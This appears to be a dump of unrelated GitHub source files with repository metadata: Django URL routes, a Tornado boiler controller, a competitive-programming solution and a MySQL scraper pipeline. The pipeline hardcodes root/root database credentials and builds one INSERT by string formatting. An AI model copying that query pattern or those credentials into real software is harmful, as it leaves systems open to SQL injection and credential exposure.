https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
    # Django admin site.
    path('admin/', admin.site.urls),
    # All remaining routes are delegated to the weather app's URLconf.
    path('', include('weather.urls')),
]
| [
"kumarajeet024@gmail.com"
] | kumarajeet024@gmail.com |
ded27cf958fde5c1dfa9281f1beb37d3c09a054e | a7cc063e55b2873a82df6e14687d7b0f47f81239 | /blog/urls.py | cf0da9e0af5b619e3070b970dacc408260ac3736 | [] | no_license | komalberia21/my-first-blog | 30474a20692d2bf8368043a69a2401c2203d9e4c | 988f492e384c238b91eaac85fdea1d7c2adf53b4 | refs/heads/master | 2020-06-03T02:26:09.749569 | 2019-08-29T11:20:47 | 2019-08-29T11:20:47 | 191,395,317 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 322 | py | from django.urls import path
from . import views
urlpatterns = [
    # Blog index: list of posts.
    path('', views.post_list , name='post_list'),
    # Detail view of one post, addressed by primary key.
    path('post/<int:pk>/', views.post_detail, name='post_detail'),
    # Create a new post.
    path('post/new/', views.post_new, name='post_new'),
    # Edit an existing post.
    path('post/<int:pk>/edit/', views.post_edit, name='post_edit'),
]
| [
"komalberia21@gmail.com"
] | komalberia21@gmail.com |
99788176d473d88c0e2070ca3d2dbe70ffc4835f | ee791a94df95be9d77fc76071b8b194e184113b3 | /main.py | 79a8727d182ef1c2ab168ecfa1c5074199d8f5d2 | [] | no_license | msb00003/boiler | bde99844aa56eed004c263e8d7415e6b8bf846d7 | d3962386ceb883d93d3808f97112574e5a42f820 | refs/heads/master | 2020-04-14T22:21:53.248312 | 2019-01-09T21:36:11 | 2019-01-09T21:36:11 | 164,159,176 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 890 | py | from tornado.ioloop import PeriodicCallback, IOLoop
from tornado.web import Application
from handlers.timing.handler import TimingHandler, get_targets
from hardware.boiler import set_boiler_high, set_boiler_low
from hardware.display import render_targets
from hardware.temperature import get_current_temperature
def get_target():
    """One control-loop tick: read schedule + sensor, update display & relay."""
    current_target, next_target = get_targets()
    measured = get_current_temperature()
    render_targets(current_target, next_target, measured)
    # Simple bang-bang control: heat while below the scheduled target.
    if current_target.target > measured:
        set_boiler_high()
    else:
        set_boiler_low()
    print(current_target.target, measured)
def make_app():
    """Start the 1 Hz control loop and build the Tornado application."""
    PeriodicCallback(get_target, 1000).start()
    app = Application([
        (r"/", TimingHandler),
    ])
    return app
if __name__ == "__main__":
    # Serve the timing API on port 8080 and run the IO loop until interrupted.
    app = make_app()
    app.listen(8080)
    IOLoop.current().start()
| [
"msb00003@gmail.com"
] | msb00003@gmail.com |
1de1b2caa5a46a524e310c70cb4922b59d81d69c | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03106/s261285927.py | acddd8336d17f956526b10a5358983a3ae205bef | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 152 | py | import sys
a,b,k=map(int,input().split())
for i in range(1,101):
if a%(101-i)==0 and b%(101-i)==0:
k-=1
if k==0:
print(101-i)
sys.exit() | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
d3ce36ee607193f43fbbd6bd77c5c2efe6ce294f | 6bb724ac45b939c2d0a8c91b20bed05123b160f0 | /Web/NLP_server/public/headless/pipeline.py | c9cf5cfcd996f6eabedfbf6ac1761cc40a2a7660 | [] | no_license | Longfei-Zhao/CHIIA | 1654bef9c2be60aed2854e420264736d1f64027d | f8560fd8ff978c6ae3383f6be34e569c80ac35a1 | refs/heads/master | 2021-10-11T11:26:41.165788 | 2019-01-25T07:41:28 | 2019-01-25T07:41:28 | 167,494,582 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,916 | py | # encoding=utf-8
import MySQLdb
from log import logger
from bs4 import BeautifulSoup
db = MySQLdb.connect("localhost", "root", "root", "NLP", charset='utf8')
settings = {'id':None,'term':None,'startDate':None,'endDate':None}
def processItem(id,title,author,content,date,crawldate,url,source):
    """ put item into mysql database

    Builds a column->value mapping (source-specific fields parsed out of the
    HTML content plus the fixed article columns) and INSERTs it into
    NLP_ARTICLE. Returns 1 on success, 0 on failure (after rollback).
    NOTE(review): the SQL is assembled by string formatting; escape_string
    protects the values, but field names coming back from processField() are
    interpolated raw -- confirm they are trusted before reusing this path.
    """
    try:
        table_content = processField(content,source)
        table_content['id'] = id
        table_content['date'] = date
        table_content['crawldate'] = crawldate
        # decode/encode round-trip drops any bytes that are not valid UTF-8.
        table_content['content'] = MySQLdb.escape_string(content).decode('utf-8','ignore').encode("utf-8")
        table_content['url'] = MySQLdb.escape_string(url)
        table_content['source'] = MySQLdb.escape_string(source)
        table_content['title'] = MySQLdb.escape_string(title).decode('utf-8','ignore').encode("utf-8")
        table_content['author'] = MySQLdb.escape_string(author)
        # Assemble "col1,col2,..." and "'v1','v2',..." strings; the leading
        # comma of each is stripped below.
        key_list =''
        value_list = ''
        for key in table_content:
            key_list = key_list +',' + key
            value_list = value_list + ",'{}'".format(table_content[key])
        key_list=key_list[1:]
        value_list=value_list[1:]
        sql = "insert into NLP_ARTICLE({}) values({})".format(key_list,value_list)
        # print(key_list,value_list)
        # sql = "insert into NLP_ARTICLE(ID,title,author,content,date,crawldate,url,source) values('%s','%s','%s','%s','%s','%s','%s','%s')"
        # (unused: leftover from the earlier parameterized variant above)
        params =(id, title, author,content, date,crawldate,url,source)
        # execute sql command
        cursor = db.cursor()
        cursor.execute(sql)
        # commit changes
        db.commit()
        return 1
    except Exception as e:
        logger.error('Cannot access database! Error Message:{}'.format(e))
        # Rollback in case there is any error
        db.rollback()
        return 0
# shut down database
def checkItemExist(id):
    """Return True if an article with this ID is already stored.

    Uses a parameterized query so the driver escapes `id` -- avoids SQL
    injection and broken statements when the ID contains quotes.
    """
    sql = "select ID from NLP_ARTICLE where ID = %s"
    cursor = db.cursor()
    cursor.execute(sql, (id,))
    result = cursor.fetchall()
    if result:
        return True
    else:
        return False
def loadSettings():
    """Populate the module-level `settings` dict from the newest NLP_SPIDER row.

    Date settings are expanded into {date, day, month, year} dicts using the
    from/to field-name conventions; everything else is stored verbatim.
    Returns the updated `settings` dict.
    """
    for key in settings:
        cursor = db.cursor()
        # Column names cannot be bound as parameters; `key` comes from the
        # fixed `settings` dict, not from user input.
        cursor.execute("select {} from NLP_SPIDER order by id DESC limit 1".format(key))
        value = cursor.fetchone()[0]
        if key == 'startDate':
            logger.info('Load settings: startDate = {}'.format(value))
            settings[key] = {'date': value, 'frd': value.day, 'frm': value.month, 'fry': value.year}
        elif key == 'endDate':
            logger.info('Load settings: endDate = {}'.format(value))
            settings[key] = {'date': value, 'tod': value.day, 'tom': value.month, 'toy': value.year}
        else:
            settings[key] = value
            logger.info('Load settings: {} = {}'.format(key, settings[key]))
    return settings
def getTaskID():
    """Return the id of the most recent NLP_SPIDER task row."""
    cursor = db.cursor()
    cursor.execute("select id from NLP_SPIDER order by id DESC limit 1")
    row = cursor.fetchone()
    return row[0]
def getDatabase():
    # Expose the module-level shared MySQL connection.
    return db
def updateProgress(progress):
    """Persist crawl progress for the current task (settings['id']).

    Parameterized query: lets the driver escape both values instead of
    interpolating them into the SQL string.
    """
    sql = "update NLP_SPIDER set progress=%s where id = %s"
    cursor = db.cursor()
    cursor.execute(sql, (progress, settings['id']))
    db.commit()
def processField(html, source):
    """Extract field/value pairs from an article's <tr> rows.

    Only 'Publication' and 'Dowjones' sources carry such a field table;
    other sources yield an empty dict. The first cell of each row is the
    field name, the second its (escaped) value. Byline ('BY') and
    location ('IN') rows are dropped because they are stored elsewhere.
    """
    table_content = {}
    if source not in ('Publication', 'Dowjones'):
        return table_content
    soup = BeautifulSoup(html, features="html.parser")
    for row in soup.find_all('tr'):
        cells = list(row.children)
        field = cells[0].get_text(strip=True)
        value = cells[1].get_text(strip=True)
        table_content[field] = MySQLdb.escape_string(value)
    table_content.pop('BY', None)
    table_content.pop('IN', None)
    return table_content
def getArticleByID(id):
    """Fetch one article row by ID.

    Returns a dict with keys ID/HD/LP/TD, or None when no row matches.
    Parameterized query avoids SQL injection via the externally supplied id.
    """
    sql = "select ID,HD,LP,TD from NLP_ARTICLE where ID = %s"
    cursor = db.cursor()
    cursor.execute(sql, (id,))
    result = cursor.fetchone()
    if result:
        return {'ID': result[0], 'HD': result[1], 'LP': result[2], 'TD': result[3]}
    return None
| [
"u5976992@anu.edu.au"
] | u5976992@anu.edu.au |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.